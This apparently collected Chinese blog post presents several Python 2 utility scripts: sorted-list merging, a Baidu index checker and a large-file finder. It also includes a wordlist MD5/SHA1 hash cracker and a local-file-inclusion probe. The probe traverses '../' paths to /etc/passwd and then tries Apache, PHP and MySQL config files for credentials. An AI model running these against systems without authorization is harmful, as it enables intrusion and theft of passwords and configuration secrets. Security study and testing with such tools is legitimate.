一些实用的Python脚本[bak]


1.有序列表的合并
#!/usr/bin/env python
# coding=utf-8
'''
假设有2个有序列表list_1、list_2,如何效率比较高的将2个list合并并保持有序状态(这里默认排序是正序)?
思路是比较简单的,无非是依次比较list_1和list_2头部第一个元素,将比较小的放在一个新的列表中,以此类推(递归),直到所有的元素都被放到新的列表中。
对于Python而言,即使是尾递归,效率也不是那么高,为了避免爆栈,通常还是会用循环的方法(loop_merge_sort)来做
'''
def recursion_merge_sort1(list_1, list_2):
    tmp = []
    if len(list_1) == 0:
        tmp.extend(list_2)
        return tmp
    elif len(list_2) == 0:
        tmp.extend(list_1)
        return tmp
    else:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        tmp += recursion_merge_sort1(list_1, list_2)
    return tmp

def recursion_merge_sort2(list_1, list_2, tmp=[]):
    if len(list_1) == 0 or len(list_2) == 0:
        tmp.extend(list_1)
        tmp.extend(list_2)
        return tmp
    else:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
        return recursion_merge_sort2(list_1, list_2, tmp)

def loop_merge_sort(list_1, list_2):
    tmp = []
    while len(list_1) > 0 and len(list_2) > 0:
        if list_1[0] < list_2[0]:
            tmp.append(list_1[0])
            del list_1[0]
        else:
            tmp.append(list_2[0])
            del list_2[0]
    tmp.extend(list_1)
    tmp.extend(list_2)
    return tmp
2.查询Baidu是否收录了某个URL
#!/usr/bin/env python
#coding=utf-8

import requests
from bs4 import BeautifulSoup as bs
import re

headers = {
    'User-Agent': 'Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+GTB7.1;+.NET+CLR+2.0.50727)'
}  # 设置UA模拟用户,还可设置多个UA提高搜索成功率

def baidu_url(word): # 构建百度搜索URL;因为是查收录,所以只显示了前10个搜索结果,还可以通过rn参数来调整搜索结果的数量
    '''
    get baidu search url
    '''
    return 'http://www.baidu.com/s?wd=%s' % word

def baidu_cont(url):  # 获取百度搜索结果页内容
    r = requests.get(url, headers=headers)
    return r.content

def serp_links(word):  #获取百度搜索结果的最终URL
    '''
    get baidu serp links with the word	[serp - 搜索引擎结果页面(Search Engine Results Page)]
    '''
    b_url = baidu_url(word)
    soup = bs(baidu_cont(b_url))
    b_tags = soup.find_all('h3', {'class': 't'})  # 获取URL的特征值是通过class="t"
    b_links = [tag.a['href'] for tag in b_tags]
    real_links = []
    for link in b_links:  # 使用requests库获取了最终URL,而不是快照URL
        try:
            r = requests.get(link, headers=headers, timeout=120)
        except Exception as e:
            real_links.append('page404')
        else:
            real_links.append(r.url)
    return real_links

def indexer(url):  # 待查URL是否在百度搜索结果的URL列表中,如果在就表示收录,反之未收录
    indexed_links = serp_links(url)
    if url in indexed_links:
        return True
    else:
        return False
3.本地暴力破解MD5/SHA1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: py_crackhash.py 穷举字典破解md5/sha1

import sys, getopt, hashlib

if len(sys.argv) == 1:
    print 'Usage: py_crackhash.py -t hashtype{md5/sha1} -h hashcode -w wordfile'
    sys.exit()

opts, args = getopt.getopt(sys.argv[1:], "t:h:w:")
hashtype = ""
hashcode = ""
wordfile = ""

for op, value in opts:
    if op == "-t":
        hashtype = value
    elif op == "-h":
        hashcode = value
    elif op == "-w":
        wordfile = value
    else:
        sys.exit()

w = file(wordfile, 'r')

if hashtype == "md5":
    while True:
        line = w.readline()
        if line:
            y = hashlib.md5(line.rstrip()).hexdigest()
            if hashcode == y:
                print "md5(%s)=%s" % (line.rstrip(), y)
                break
        else:
            print 'NULL'
            break

if hashtype == "sha1":
    while True:
        line = w.readline()
        if line:
            y = hashlib.sha1(line.rstrip()).hexdigest()
            if hashcode == y:
                print "sha1(%s)=%s" % (line.rstrip(), y)
                break
        else:
            print 'NULL'
            break

w.close()
4.多线程查找指定目录下的最大的10个文件
#!/usr/bin/env python
# coding=utf-8
import os, os.path
from ConfigParser import RawConfigParser as rcp
from threading import Thread, Lock
import sys
import time
MaxCount=10

def insert(tenmax, filename, filesize):
    i=0
    while i<len(tenmax) and tenmax[i][1]>filesize:
        i += 1
    tenmax.insert(i, [filename, filesize])

def keepTenMax(tenmax, filename, filesize):
    i=len(tenmax)
    if i<MaxCount:
        insert(tenmax, filename, filesize)
    else:
        if filesize>tenmax[i-1][1]:
            insert(tenmax, filename, filesize)
            tenmax.pop()
        elif filesize==tenmax[i-1][1]:
            tenmax.append([filename, filesize])
            if len(tenmax)>MaxCount:
                tenmax=tenmax[:MaxCount]
        else:
            return

class MyThread(Thread):#多线程搜索
    def __init__(self, root, files, tname):
        Thread.__init__(self)
        self.root=root
        self.files=files
        self.name=tname
        self.tenmax=[]
    def run(self):
        global count
        for f in self.files:
            filename=self.root+os.sep+f
            filesize=os.stat(filename).st_size
            mylock.acquire() #获得锁
            count += 1
            mylock.release() #释放锁
            keepTenMax(self.tenmax, filename, filesize)

def allDone(threadlist):
    for i in threadlist:
        if i.isAlive():
            return False
    return True

#main
if __name__=="__main__":
    global count #全局文件计数
    mylock=Lock() #define a lock
    count=1
    tenmax=[]
    threadlist=[]
    if len(sys.argv)==1:
        wdir='.'
    elif len(sys.argv)==2:
        wdir=sys.argv[1]
    else:
        print 'Usage: findBigFiles.py [wdir]'
        sys.exit()
    tname=1
    begin=time.time()
    for root, dirs, files in os.walk(wdir):
        if files:
            sthread=MyThread(root, files, tname)#对每一个目录开启一个线程搜索
            threadlist.append(sthread)
            sthread.start()
            print 'thread-'+str(tname)+'-start search dir:'+root
            tname += 1
    for t in threadlist:
        t.join()
    if allDone(threadlist):#统计结果
        for i in threadlist:
            tenmax.extend(i.tenmax)
    if len(tenmax)<MaxCount:
        tenmax=tenmax[:len(tenmax)]
    else:
        a=[]
        for f in tenmax:
            keepTenMax(a, f[0], f[1])
        tenmax=a
    #打印并输出到parser文件-当前目录下的result.ini文件
    print
    print '[=========================threads count', len(threadlist), '====================]'
    print '[=========================try', count, 'files=======================]'
    print '[=========================the ', MaxCount, ' thMax files list===========]'
    print
    c=1
    myrcp=rcp()
    myrcp.add_section('Result')
    for fname, fsize in tenmax:
        size='%.3fMB' % (fsize/1024.0/1024.0)
        print '[%d]%s-%s' % (c, fname, size)
        myrcp.set('Result', '[%d]%s' % (c, fname), size)
        c += 1
    myrcp.write(open('result.txt', 'w'))
    end=time.time()
    usetime=end-begin
    print
    print '[=============================================================]'
    print 'all time:%.3fs' % usetime
5.探测本地文件包含漏洞
#!/usr/bin/env python
#-*-coding:utf-8-*-

import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("|           usage:py_detect_LFI.py site url         |")
print ("|this url like http://www.google.com/index.php?id=  |")
print ("       writed by eip_0x[Freebuf],just 4 fun         |")
print ("-----------------------------------------------------")

site0=sys.argv[1]+'/kfdsjkf7675637d.txt'	#访问一个不存在的文件获取返回错误页面的length信息
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)

while 1:
    data0=conn0.read(4072)	#错误页面的内容
    if not len(data0):
        break

paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf']

for path in paths1:	#首先查找'/etc/passwd'文件是否存在
	site=sys.argv[1]+path
	req=urllib2.Request(site)
	conn=urllib2.urlopen(req)
	while 1:
		data=conn.read(4072)
		if not len(data0):
			break

		if len(data)!=len(data0):
			print path," this file has been found!!!!u r lucky and have fun!!!!"

		for path2 in paths2:	#在查找到了'/etc/passwd'文件之后再查找配置文件,希望能从中读取出用户名密码的明文信息
			path2ok=path.replace("/etc/passwd",path2)	#replace("查找的内容","替换后的内容"[,次数]),替换次数可以为空,即表示替换所有
			site2=sys.argv[1]+path2ok
			req2=urllib2.Request(site2)
			conn2=urllib2.urlopen(req2)
			while 1:
				data2=conn2.read(4072)
				if not len(data2):
					break
				if len(data2)!=len(data0):
					print path2,"this file has been found!!"
6.待续……

==

这里的很多代码都是在网上逛blog的时候收集而来,在此感谢作者的无私分享(有些代码已经忘了出处了,找到了之后会尽快补上)。

,

《“一些实用的Python脚本[bak]”》 有 1 条评论

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注